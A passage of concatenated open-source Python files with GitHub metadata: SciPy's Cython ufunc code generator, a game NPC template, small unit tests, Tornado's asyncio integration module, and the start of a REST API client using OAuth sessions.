c = False
if header.endswith("++"):
cpp = True
else:
cpp = False
intypes = [CY_TYPES[x] for x in incodes]
outtypes = [CY_TYPES[x] for x in outcodes]
retcode = re.sub(r'\*.*', '', retcode)
if not retcode:
retcode = 'v'
rettype = CY_TYPES[retcode]
if cpp:
# Functions from _ufuncs_cxx are exported as a void*
# pointers; cast them to the correct types
func_name = "scipy.special._ufuncs_cxx._export_{}".format(func_name)
func_name = "(<{}(*)({}) nogil>{})"\
.format(rettype, ", ".join(intypes + outtypes), func_name)
else:
func_name = self.cython_func_name(func_name, specialized=True)
if signum == 0:
adverb = "if"
else:
adverb = "elif"
cond = self._get_conditional(self.intypes, incodes, adverb)
if cond:
lines = [tab + cond]
sp = 2*tab
else:
lines = []
sp = tab
return func_name, incodes, outcodes, retcode, \
intypes, outtypes, rettype, c, lines, sp
def _generate_from_return_and_no_outargs(self):
tab = " "*4
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
call = "{}({})".format(func_name, ", ".join(callvars))
if c and rettype == "double complex":
call = double_complex_from_npy_cdouble(call)
line = sp + "return {}".format(call)
body.append(line)
sig = "{}->{}".format(incodes, retcode)
specs.append(sig)
if len(specs) > 1:
# Return nan for signatures without a specialization
body.append(tab + "else:")
outtype, outcodes = self.outtypes[0]
last = len(outcodes) - 1
if len(outcodes) == 1:
line = "return {}".format(NAN_VALUE[outcodes])
body.append(2*tab + line)
else:
for n, code in enumerate(outcodes):
if n == 0:
adverb = "if"
elif n == last:
adverb = "else"
else:
adverb = "elif"
cond = self._get_conditional(self.outtypes, code, adverb)
body.append(2*tab + cond)
line = "return {}".format(NAN_VALUE[code])
body.append(3*tab + line)
# Generate the head of the function
callvars, head = [], []
for n, (intype, _) in enumerate(self.intypes):
callvars.append("{} {}".format(intype, self.invars[n]))
(outtype, _) = self.outtypes[0]
dec = "cpdef {} {}({}) nogil".format(outtype, self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
src = "\n".join(head + body)
return dec, src, specs
def _generate_from_outargs_and_no_return(self):
tab = " "*4
all_tmpvars = set()
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
outcallvars, tmpvars, casts = self._get_outcallvars(outtypes, c)
callvars.extend(outcallvars)
all_tmpvars.update(tmpvars)
call = "{}({})".format(func_name, ", ".join(callvars))
body.append(sp + call)
body.extend([sp + x for x in casts])
if len(outcodes) == 1:
sig = "{}->{}".format(incodes, outcodes)
specs.append(sig)
else:
sig = "{}*{}->v".format(incodes, outcodes)
specs.append(sig)
if len(specs) > 1:
lines = self._get_nan_decs()
body.extend(lines)
if len(self.outvars) == 1:
line = "return {}[0]".format(self.outvars[0])
body.append(tab + line)
# Generate the head of the function
callvars, head = [], []
for invar, (intype, _) in zip(self.invars, self.intypes):
callvars.append("{} {}".format(intype, invar))
if len(self.outvars) > 1:
for outvar, (outtype, _) in zip(self.outvars, self.outtypes):
callvars.append("{} *{}".format(outtype, outvar))
if len(self.outvars) == 1:
outtype, _ = self.outtypes[0]
dec = "cpdef {} {}({}) nogil".format(outtype, self.name, ", ".join(callvars))
else:
dec = "cdef void {}({}) nogil".format(self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
if len(self.outvars) == 1:
outvar = self.outvars[0]
outtype, _ = self.outtypes[0]
line = "cdef {} {}".format(outtype, outvar)
head.append(tab + line)
head.extend(self._get_tmp_decs(all_tmpvars))
src = "\n".join(head + body)
return dec, src, specs
def _generate_from_outargs_and_return(self):
tab = " "*4
all_tmpvars = set()
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
outcallvars, tmpvars, casts = self._get_outcallvars(outtypes, c)
callvars.extend(outcallvars)
all_tmpvars.update(tmpvars)
call = "{}({})".format(func_name, ", ".join(callvars))
if c and rettype == "double complex":
call = double_complex_from_npy_cdouble(call)
call = "{}[0] = {}".format(self.outvars[0], call)
body.append(sp + call)
body.extend([sp + x for x in casts])
sig = "{}*{}->v".format(incodes, outcodes + retcode)
specs.append(sig)
if len(specs) > 1:
lines = self._get_nan_decs()
body.extend(lines)
# Generate the head of the function
callvars, head = [], []
for invar, (intype, _) in zip(self.invars, self.intypes):
callvars.append("{} {}".format(intype, invar))
for outvar, (outtype, _) in zip(self.outvars, self.outtypes):
callvars.append("{} *{}".format(outtype, outvar))
dec = "cdef void {}({}) nogil".format(self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
head.extend(self._get_tmp_decs(all_tmpvars))
src = "\n".join(head + body)
return dec, src, specs
def generate(self):
_, _, outcodes, retcode, _ = self.signatures[0]
retcode = re.sub(r'\*.*', '', retcode)
if not retcode:
retcode = 'v'
if len(outcodes) == 0 and retcode != 'v':
dec, src, specs = self._generate_from_return_and_no_outargs()
elif len(outcodes) > 0 and retcode == 'v':
dec, src, specs = self._generate_from_outargs_and_no_return()
elif len(outcodes) > 0 and retcode != 'v':
dec, src, specs = self._generate_from_outargs_and_return()
else:
raise ValueError("Invalid signature")
if len(self.outvars) > 1:
wrap = self._get_python_wrap()
else:
wrap = None
return dec, src, specs, self.fused_types, wrap
def get_declaration(ufunc, c_name, c_proto, cy_proto, header,
proto_h_filename):
"""
Construct a Cython declaration of a function coming either from a
pxd or a header file. Do sufficient tricks to enable compile-time
type checking against the signature expected by the ufunc.
"""
defs = []
defs_h = []
var_name = c_name.replace('[', '_').replace(']', '_').replace(' ', '_')
if header.endswith('.pxd'):
defs.append("from .%s cimport %s as %s" % (
header[:-4], ufunc.cython_func_name(c_name, prefix=""),
ufunc.cython_func_name(c_name)))
# check function signature at compile time
proto_name = '_proto_%s_t' % var_name
defs.append("ctypedef %s" % (cy_proto.replace('(*)', proto_name)))
defs.append("cdef %s *%s_var = &%s" % (
proto_name, proto_name, ufunc.cython_func_name(c_name, specialized=True)))
else:
# redeclare the function, so that the assumed
# signature is checked at compile time
new_name = "%s \"%s\"" % (ufunc.cython_func_name(c_name), c_name)
defs.append(f'cdef extern from r"{proto_h_filename}":')
defs.append(" cdef %s" % (cy_proto.replace('(*)', new_name)))
defs_h.append(f'#include "{header}"')
defs_h.append("%s;" % (c_proto.replace('(*)', c_name)))
return defs, defs_h, var_name
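# Illustrative only (hypothetical function and header names): for a prototype
# coming from a C header, the snippets built above are expected to look roughly
# like
#
#     defs   = ['cdef extern from r"_ufuncs_defs.h":',
#               '    cdef double my_func "my_func"(double) nogil']
#     defs_h = ['#include "my_header.h"', 'double my_func(double);']
#
# i.e. the function is re-declared under its own name so that Cython checks the
# assumed signature at compile time.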
def generate_ufuncs(fn_prefix, cxx_fn_prefix, ufuncs):
filename = fn_prefix + ".pyx"
proto_h_filename = fn_prefix + '_defs.h'
cxx_proto_h_filename = cxx_fn_prefix + '_defs.h'
cxx_pyx_filename = cxx_fn_prefix + ".pyx"
cxx_pxd_filename = cxx_fn_prefix + ".pxd"
toplevel = ""
# for _ufuncs*
defs = []
defs_h = []
all_loops = {}
# for _ufuncs_cxx*
cxx_defs = []
cxx_pxd_defs = [
"from . cimport sf_error",
"cdef void _set_action(sf_error.sf_error_t, sf_error.sf_action_t) nogil"
]
cxx_defs_h = []
ufuncs.sort(key=lambda u: u.name)
for ufunc in ufuncs:
# generate function declaration and type checking snippets
cfuncs = ufunc.get_prototypes()
for c_name, c_proto, cy_proto, header in cfuncs:
if header.endswith('++'):
header = header[:-2]
# for the CXX module
item_defs, item_defs_h, var_name = get_declaration(ufunc, c_name, c_proto, cy_proto,
header, cxx_proto_h_filename)
cxx_defs.extend(item_defs)
cxx_defs_h.extend(item_defs_h)
cxx_defs.append("cdef void *_export_%s = <void*>%s" % (
var_name, ufunc.cython_func_name(c_name, specialized=True, override=False)))
cxx_pxd_defs.append("cdef void *_export_%s" % (var_name,))
# let cython grab the function pointer from the c++ shared library
ufunc.function_name_overrides[c_name] = "scipy.special._ufuncs_cxx._export_" + var_name
else:
# usual case
item_defs, item_defs_h, _ = get_declaration(ufunc, c_name, c_proto, cy_proto, header,
proto_h_filename)
defs.extend(item_defs)
defs_h.extend(item_defs_h)
# ufunc creation code snippet
t = ufunc.generate(all_loops)
toplevel += t + "\n"
# Produce output
toplevel = "\n".join(sorted(all_loops.values()) + defs + [toplevel])
# Generate an `__all__` for the module
all_ufuncs = (
[
"'{}'".format(ufunc.name)
for ufunc in ufuncs if not ufunc.name.startswith('_')
]
+ ["'geterr'", "'seterr'", "'errstate'", "'jn'"]
)
module_all = '__all__ = [{}]'.format(', '.join(all_ufuncs))
with open(filename, 'w') as f:
f.write(UFUNCS_EXTRA_CODE_COMMON)
f.write(UFUNCS_EXTRA_CODE)
f.write(module_all)
f.write("\n")
f.write(toplevel)
f.write(UFUNCS_EXTRA_CODE_BOTTOM)
defs_h = unique(defs_h)
with open(proto_h_filename, 'w') as f:
f.write("#ifndef UFUNCS_PROTO_H\n#define UFUNCS_PROTO_H 1\n")
f.write("\n".join(defs_h))
f.write("\n#endif\n")
cxx_defs_h = unique(cxx_defs_h)
with open(cxx_proto_h_filename, 'w') as f:
f.write("#ifndef UFUNCS_PROTO_H\n#define UFUNCS_PROTO_H 1\n")
f.write("\n".join(cxx_defs_h))
f.write("\n#endif\n")
with open(cxx_pyx_filename, 'w') as f:
f.write(UFUNCS_EXTRA_CODE_COMMON)
f.write("\n")
f.write("\n".join(cxx_defs))
f.write("\n# distutils: language = c++\n")
with open(cxx_pxd_filename, 'w') as f:
f.write("\n".join(cxx_pxd_defs))
def generate_fused_funcs(modname, ufunc_fn_prefix, fused_funcs):
pxdfile = modname + ".pxd"
pyxfile = modname + ".pyx"
proto_h_filename = ufunc_fn_prefix + '_defs.h'
sources = []
declarations = []
# Code for benchmarks
bench_aux = []
fused_types = set()
# Parameters for the tests
doc = []
defs = []
for func in fused_funcs:
if func.name.startswith("_"):
# Don't try to deal with functions that have extra layers
# of wrappers.
continue
# Get the function declaration for the .pxd and the source
# code for the .pyx
dec, src, specs, func_fused_types, wrap = func.generate()
declarations.append(dec)
sources.append(src)
if wrap:
sources.append(wrap)
fused_types.update(func_fused_types)
# Declare the specializations
cfuncs = func.get_prototypes(nptypes_for_h=True)
for c_name, c_proto, cy_proto, header in cfuncs:
if header.endswith('++'):
# We grab the c++ functions from the c++ module
continue
item_defs, _, _ = get_declaration(func, c_name, c_proto,
cy_proto, header,
proto_h_filename)
defs.extend(item_defs)
# Add a line to the documentation
doc.append(generate_doc(func.name, specs))
# Generate code for benchmarks
if func.name in CYTHON_SPECIAL_BENCHFUNCS:
for codes in CYTHON_SPECIAL_BENCHFUNCS[func.name]:
pybench, cybench = generate_bench(func.name, codes)
bench_aux.extend([pybench, cybench])
fused_types = list(fused_types)
fused_types.sort()
with open(pxdfile, 'w') as f:
f.write(CYTHON_SPECIAL_PXD)
f.write("\n")
f.write("\n\n".join(fused_types))
f.write("\n\n")
f.write("\n".join(declarations))
with open(pyxfile, 'w') as f:
header = CYTHON_SPECIAL_PYX
header = header.replace("FUNCLIST", "\n".join(doc))
f.write(header)
f.write("\n")
f.write("\n".join(defs))
f.write("\n\n")
f.write("\n\n".join(sources))
f.write("\n\n")
f.write("\n\n".join(bench_aux))
def generate_ufuncs_type_stubs(module_name: str, ufuncs: List[Ufunc]):
stubs, module_all = [], []
for ufunc in ufuncs:
stubs.append(f'{ufunc.name}: np.ufunc')
if not ufunc.name.startswith('_'):
module_all.append(f"'{ufunc.name}'")
# jn is an alias for jv.
module_all.append("'jn'")
stubs.append('jn: np.ufunc')
module_all.sort()
stubs.sort()
contents = STUBS.format(
ALL=',\n '.join(module_all),
STUBS='\n'.join(stubs),
)
stubs_file = f'{module_name}.pyi'
with open(stubs_file, 'w') as f:
f.write(contents)
def unique(lst):
"""
Return a list without repeated entries (first occurrence is kept),
preserving order.
"""
seen = set()
new_lst = []
for item in lst:
if item in seen:
continue
seen.add(item)
new_lst.append(item)
return new_lst
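# For illustration: unique(["a", "b", "a", "c", "b"]) returns ["a", "b", "c"].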
def newer(source, target):
"""
Return true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't. Return false if
both exist and 'target' is the same age or younger than 'source'.
"""
if not os.path.exists(source):
raise ValueError("file '%s' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return 1
mtime1 = os.stat(source)[ST_MTIME]
mtime2 = os.stat(target)[ST_MTIME]
return mtime1 > mtime2
def all_newer(src_files, dst_files):
return all(os.path.exists(dst) and newer(dst, src)
for dst in dst_files for src in src_files)
def main(outdir):
pwd = os.path.dirname(__file__)
src_files = (os.path.abspath(__file__),
os.path.abspath(os.path.join(pwd, 'functions.json')),
os.path.abspath(os.path.join(pwd, '_add_newdocs.py')))
dst_files = ('_ufuncs.pyx',
'_ufuncs_defs.h',
'_ufuncs_cxx.pyx',
'_ufuncs_cxx.pxd',
'_ufuncs_cxx_defs.h',
'_ufuncs.pyi',
'cython_special.pyx',
'cython_special.pxd')
dst_files = (os.path.join(outdir, f) for f in dst_files)
os.chdir(BASE_DIR)
if all_newer(src_files, dst_files):
print("scipy/special/_generate_pyx.py: all files up-to-date")
return
ufuncs, fused_funcs = [], []
with open('functions.json') as data:
functions = json.load(data)
for f, sig in functions.items():
ufuncs.append(Ufunc(f, sig))
fused_funcs.append(FusedFunc(f, sig))
generate_ufuncs(os.path.join(outdir, "_ufuncs"),
os.path.join(outdir, "_ufuncs_cxx"),
ufuncs)
generate_ufuncs_type_stubs(os.path.join(outdir, "_ufuncs"),
ufuncs)
generate_fused_funcs(os.path.join(outdir, "cython_special"),
os.path.join(outdir, "_ufuncs"),
fused_funcs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--outdir", type=str,
help="Path to the output directory")
args = parser.parse_args()
if not args.outdir:
#raise ValueError(f"Missing `--outdir` argument to _generate_pyx.py")
# We're dealing with a distutils build here, write in-place:
outdir_abs = os.path.abspath(os.path.dirname(__file__))
else:
outdir_abs = os.path.join(os.getcwd(), args.outdir)
main(outdir_abs)
| {
"content_hash": "c6bc312b560429e7ef2ce6f9c59f4249",
"timestamp": "",
"source": "github",
"line_count": 1519,
"max_line_length": 108,
"avg_line_length": 34.45161290322581,
"alnum_prop": 0.5436444240617595,
"repo_name": "perimosocordiae/scipy",
"id": "8e3e49dbabf5ca9f9612a1d239b60cc8a3ad5a73",
"size": "52332",
"binary": false,
"copies": "10",
"ref": "refs/heads/main",
"path": "scipy/special/_generate_pyx.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4620237"
},
{
"name": "C++",
"bytes": "959068"
},
{
"name": "Cython",
"bytes": "1059810"
},
{
"name": "Dockerfile",
"bytes": "16894"
},
{
"name": "Fortran",
"bytes": "5211680"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Meson",
"bytes": "143727"
},
{
"name": "Python",
"bytes": "15434780"
},
{
"name": "R",
"bytes": "3059"
},
{
"name": "Shell",
"bytes": "18009"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_noble_old_zabrak_male_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","zabrak_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "5fb7dc87e13ed849103b0d73b6b06676",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 78,
"avg_line_length": 24.076923076923077,
"alnum_prop": 0.6964856230031949,
"repo_name": "obi-two/Rebelion",
"id": "0c1a492e74ba99fc2fa9bccc6416f750c25d015d",
"size": "458",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_noble_old_zabrak_male_01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
import warnings as _warnings
_warnings.resetwarnings()
_warnings.filterwarnings('error')
from tdi.integration import wtf_service as _wtf_service
class Param(object):
def multi(self, name):
return []
param = Param()
adapter = _wtf_service.RequestParameterAdapter(param)
print adapter.getlist == param.multi
class Inherited(_wtf_service.RequestParameterAdapter):
pass
adapter = Inherited(param)
print adapter.getlist == param.multi
| {
"content_hash": "f157d0cad1259d833d043975a1e131d2",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 55,
"avg_line_length": 23.736842105263158,
"alnum_prop": 0.7560975609756098,
"repo_name": "ndparker/tdi",
"id": "3af6f68d2adc736d173d43b830ea7a50ecae9106",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/integration/wtf_service/adapter_inherit.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "567028"
},
{
"name": "C++",
"bytes": "6510"
},
{
"name": "HTML",
"bytes": "998"
},
{
"name": "Python",
"bytes": "1032169"
},
{
"name": "Shell",
"bytes": "425"
}
],
"symlink_target": ""
} |
import json
import os
import unittest
import PTN
class ParseTest(unittest.TestCase):
def test_parser(self):
json_input = os.path.join(os.path.dirname(__file__), 'files/input.json')
with open(json_input) as input_file:
torrents = json.load(input_file)
json_output = os.path.join(os.path.dirname(__file__), 'files/output.json')
with open(json_output) as output_file:
expected_results = json.load(output_file)
self.assertEqual(len(torrents), len(expected_results))
for torrent, expected_result in zip(torrents, expected_results):
print("Test: " + torrent)
result = PTN.parse(torrent)
for key in expected_result:
if not expected_result[key]:
self.assertNotIn(key, result)
else:
self.assertIn(key, result)
result1 = result[key]
if key == 'excess' and type(result1) == list:
result1 = ', '.join(result1)
self.assertEqual(result1, expected_result[key])
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "f85288515337074670c4665344328ff8",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 82,
"avg_line_length": 33.4,
"alnum_prop": 0.561163387510693,
"repo_name": "divijbindlish/parse-torrent-name",
"id": "9db0507014fc7da0d9095de41fc7770f3245d2d0",
"size": "1216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_parse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8747"
}
],
"symlink_target": ""
} |
"""Bridges between the `asyncio` module and Tornado IOLoop.
.. versionadded:: 3.2
This module integrates Tornado with the ``asyncio`` module introduced
in Python 3.4 (and available `as a separate download
<https://pypi.python.org/pypi/asyncio>`_ for Python 3.3). This makes
it possible to combine the two libraries on the same event loop.
Most applications should use `AsyncIOMainLoop` to run Tornado on the
default ``asyncio`` event loop. Applications that need to run event
loops on multiple threads may use `AsyncIOLoop` to create multiple
loops.
.. note::
Tornado requires the `~asyncio.AbstractEventLoop.add_reader` family of
methods, so it is not compatible with the `~asyncio.ProactorEventLoop` on
Windows. Use the `~asyncio.SelectorEventLoop` instead.
"""
from __future__ import absolute_import, division, print_function
import functools
import tornado.concurrent
from tornado.gen import convert_yielded
from tornado.ioloop import IOLoop
from tornado import stack_context
try:
# Import the real asyncio module for py33+ first. Older versions of the
# trollius backport also use this name.
import asyncio # type: ignore
except ImportError as e:
# Asyncio itself isn't available; see if trollius is (backport to py26+).
try:
import trollius as asyncio # type: ignore
except ImportError:
# Re-raise the original asyncio error, not the trollius one.
raise e
class BaseAsyncIOLoop(IOLoop):
def initialize(self, asyncio_loop, close_loop=False, **kwargs):
super(BaseAsyncIOLoop, self).initialize(**kwargs)
self.asyncio_loop = asyncio_loop
self.close_loop = close_loop
# Maps fd to (fileobj, handler function) pair (as in IOLoop.add_handler)
self.handlers = {}
# Set of fds listening for reads/writes
self.readers = set()
self.writers = set()
self.closing = False
def close(self, all_fds=False):
self.closing = True
for fd in list(self.handlers):
fileobj, handler_func = self.handlers[fd]
self.remove_handler(fd)
if all_fds:
self.close_fd(fileobj)
if self.close_loop:
self.asyncio_loop.close()
def add_handler(self, fd, handler, events):
fd, fileobj = self.split_fd(fd)
if fd in self.handlers:
raise ValueError("fd %s added twice" % fd)
self.handlers[fd] = (fileobj, stack_context.wrap(handler))
if events & IOLoop.READ:
self.asyncio_loop.add_reader(
fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
if events & IOLoop.WRITE:
self.asyncio_loop.add_writer(
fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
def update_handler(self, fd, events):
fd, fileobj = self.split_fd(fd)
if events & IOLoop.READ:
if fd not in self.readers:
self.asyncio_loop.add_reader(
fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
else:
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if events & IOLoop.WRITE:
if fd not in self.writers:
self.asyncio_loop.add_writer(
fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
else:
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
def remove_handler(self, fd):
fd, fileobj = self.split_fd(fd)
if fd not in self.handlers:
return
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
del self.handlers[fd]
def _handle_events(self, fd, events):
fileobj, handler_func = self.handlers[fd]
handler_func(fileobj, events)
def start(self):
old_current = IOLoop.current(instance=False)
try:
self._setup_logging()
self.make_current()
self.asyncio_loop.run_forever()
finally:
if old_current is None:
IOLoop.clear_current()
else:
old_current.make_current()
def stop(self):
self.asyncio_loop.stop()
def call_at(self, when, callback, *args, **kwargs):
# asyncio.call_at supports *args but not **kwargs, so bind them here.
# We do not synchronize self.time and asyncio_loop.time, so
# convert from absolute to relative.
return self.asyncio_loop.call_later(
max(0, when - self.time()), self._run_callback,
functools.partial(stack_context.wrap(callback), *args, **kwargs))
def remove_timeout(self, timeout):
timeout.cancel()
def add_callback(self, callback, *args, **kwargs):
if self.closing:
# TODO: this is racy; we need a lock to ensure that the
# loop isn't closed during call_soon_threadsafe.
raise RuntimeError("IOLoop is closing")
self.asyncio_loop.call_soon_threadsafe(
self._run_callback,
functools.partial(stack_context.wrap(callback), *args, **kwargs))
add_callback_from_signal = add_callback
class AsyncIOMainLoop(BaseAsyncIOLoop):
"""``AsyncIOMainLoop`` creates an `.IOLoop` that corresponds to the
current ``asyncio`` event loop (i.e. the one returned by
``asyncio.get_event_loop()``). Recommended usage::
from tornado.platform.asyncio import AsyncIOMainLoop
import asyncio
AsyncIOMainLoop().install()
asyncio.get_event_loop().run_forever()
See also :meth:`tornado.ioloop.IOLoop.install` for general notes on
installing alternative IOLoops.
"""
def initialize(self, **kwargs):
super(AsyncIOMainLoop, self).initialize(asyncio.get_event_loop(),
close_loop=False, **kwargs)
class AsyncIOLoop(BaseAsyncIOLoop):
"""``AsyncIOLoop`` is an `.IOLoop` that runs on an ``asyncio`` event loop.
This class follows the usual Tornado semantics for creating new
``IOLoops``; these loops are not necessarily related to the
``asyncio`` default event loop. Recommended usage::
from tornado.ioloop import IOLoop
IOLoop.configure('tornado.platform.asyncio.AsyncIOLoop')
IOLoop.current().start()
Each ``AsyncIOLoop`` creates a new ``asyncio.EventLoop``; this object
can be accessed with the ``asyncio_loop`` attribute.
"""
def initialize(self, **kwargs):
loop = asyncio.new_event_loop()
try:
super(AsyncIOLoop, self).initialize(loop, close_loop=True, **kwargs)
except Exception:
# If initialize() does not succeed (taking ownership of the loop),
# we have to close it.
loop.close()
raise
def to_tornado_future(asyncio_future):
"""Convert an `asyncio.Future` to a `tornado.concurrent.Future`.
.. versionadded:: 4.1
"""
tf = tornado.concurrent.Future()
tornado.concurrent.chain_future(asyncio_future, tf)
return tf
def to_asyncio_future(tornado_future):
"""Convert a Tornado yieldable object to an `asyncio.Future`.
.. versionadded:: 4.1
.. versionchanged:: 4.3
Now accepts any yieldable object, not just
`tornado.concurrent.Future`.
"""
tornado_future = convert_yielded(tornado_future)
af = asyncio.Future()
tornado.concurrent.chain_future(tornado_future, af)
return af
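# Illustrative sketch (hypothetical coroutine names): either direction of the
# bridge can be used explicitly, e.g.
#
#     asyncio_future = to_asyncio_future(some_tornado_coroutine())
#     tornado_future = to_tornado_future(asyncio.ensure_future(some_asyncio_coro()))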
if hasattr(convert_yielded, 'register'):
convert_yielded.register(asyncio.Future, to_tornado_future) # type: ignore
| {
"content_hash": "c8f5465fcd65309a2b683d602724f344",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 80,
"avg_line_length": 35.689189189189186,
"alnum_prop": 0.6269089991164962,
"repo_name": "ajdavis/tornado",
"id": "830ee1f3b1b68d97fc1871798f59740155e18403",
"size": "7923",
"binary": false,
"copies": "22",
"ref": "refs/heads/master",
"path": "tornado/platform/asyncio.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1664"
},
{
"name": "HTML",
"bytes": "25"
},
{
"name": "Python",
"bytes": "1554297"
},
{
"name": "Ruby",
"bytes": "1428"
},
{
"name": "Shell",
"bytes": "4070"
}
],
"symlink_target": ""
} |
"""
rest client
~~~~~~~~~~~~~~~~
RESTful api client.
:copyright: 2012-18 by raptor.zh@gmail.com
"""
import sys
PY3 = sys.version_info[0] >= 3
if PY3:
from io import IOBase
def isIOBase(obj):
return isinstance(obj, IOBase)
else:
from cStringIO import InputType
from StringIO import StringIO
def isIOBase(obj):
return isinstance(obj, file) or isinstance(obj, StringIO) or isinstance(obj, InputType)
from functools import partial
import json
import logging
from requests_oauthlib import OAuth1Session, OAuth2Session
logger = logging.getLogger(__name__)
class APIObject(object):
def __init__(self, client, objname):
self.client = client
self.objname = objname
def __getattr__(self, name):
funcs = name.split("_")
fn = self.client.get_func(funcs[0], "_".join(
[f if f != "ID" else "%s" for f in funcs[1:]]), self.objname)
if fn:
setattr(self, name, fn)
return fn
else:
raise AttributeError('Invalid function name!')
class APIClient(object):
def __init__(self, auth, url, objlist=None, postcall=None, postfix="", verify=True, proxies=None):
"""
API client base class
:param auth: AuthOAuth1 or AuthOAuth2 object
:param url: API base url
:param objlist: available API objects
:param postcall: method will be called after API calling
:param postfix: API method postfix, eg. .json or .xml
:param verify: https verify
:param proxies: proxies, like: {"http": "http://10.10.1.10:3128", "https": "http://10.10.1.10:1080"}
"""
self.auth = auth
self.url = url
self.objlist = objlist
self.postcall = postcall if postcall else lambda r: r.json()
self.postfix = postfix
self.auth.verify = verify
self.auth.proxies = proxies
def __getattr__(self, name):
s = name.replace("_", "/")
        s = s.replace("//", "_")  # a double underscore collapses back to a literal "_" and is not treated as a path separator
funcs = s.split("/")
fn = self.get_func(funcs[0], "/".join([f if f != "ID" else "%s" for f in funcs[1:]]))
if fn:
setattr(self, name, fn)
return fn
elif (not self.objlist) or (name in self.objlist):
obj = APIObject(self, name)
setattr(self, name, obj)
return obj
else:
raise AttributeError("Invalid object name!")
def get_func(self, method, func, objname=None):
fn = None
if method in ['GET', 'POST', 'PUT', 'DELETE']:
if objname:
func = "/".join([objname, "%s", func] if func else [objname, "%s"])
if self.postfix:
func = ".".join([func, self.postfix])
fn = partial(self._generic_call, method, func)
return fn
def _generic_call(self, method, func, *args, **kwargs):
if func:
if len(args) == 0:
index = func.find("/%s")
if index >= 0:
func = "".join([func[:index], func[index+3:]])
else:
                func = func % args  # raises TypeError if the args do not match the placeholders
url = "/".join([self.url, func])
try:
kwargs.update(self.extra_params)
except AttributeError:
pass
return self._process(method, url, **kwargs)
def _process(self, method, url, **kwargs):
logger.debug(str(kwargs))
fn = getattr(self.auth, method.lower())
if fn:
if method in ['GET', 'DELETE']:
r = fn(url, params=kwargs, verify=self.auth.verify, proxies=self.auth.proxies)
else:
files = {}
for k, v in kwargs.items():
if isIOBase(v):
files[k] = v
for k in files.keys():
del kwargs[k]
r = fn(url, data=kwargs, files=files if files else None,
verify=self.auth.verify, proxies=self.auth.proxies)
else:
raise AttributeError("Invalid http method name!")
r.raise_for_status()
return self.postcall(r)
def _request(self, method, url_path, *args, **kwargs):
url = "/".join([self.url, url_path.format(*args)])
return self._process(method, url, **kwargs)
def get(self, url, *args, **kwargs):
return self._request("GET", url, *args, **kwargs)
def post(self, url, *args, **kwargs):
return self._request("POST", url, *args, **kwargs)
def put(self, url, *args, **kwargs):
return self._request("PUT", url, *args, **kwargs)
def delete(self, url, *args, **kwargs):
return self._request("DELETE", url, *args, **kwargs)
class AuthOAuth1(OAuth1Session):
def __init__(self, client_id, client_secret, redirect_uri,
request_token_uri, authorization_uri, access_token_uri,
access_token=None, access_secret=None,
https=True, **kwargs):
super(AuthOAuth1, self).__init__(client_key=client_id, client_secret=client_secret,
resource_owner_key=access_token, resource_owner_secret=access_secret,
callback_uri=redirect_uri, **kwargs)
self.callback_uri = redirect_uri
self.request_token_uri = request_token_uri
self.authorization_uri = authorization_uri
self.access_token_uri = access_token_uri
self.https = https
if access_token and access_secret: # request_token
self.token = {"oauth_token": access_token, "oauth_token_secret": access_secret}
def get_token_str(self):
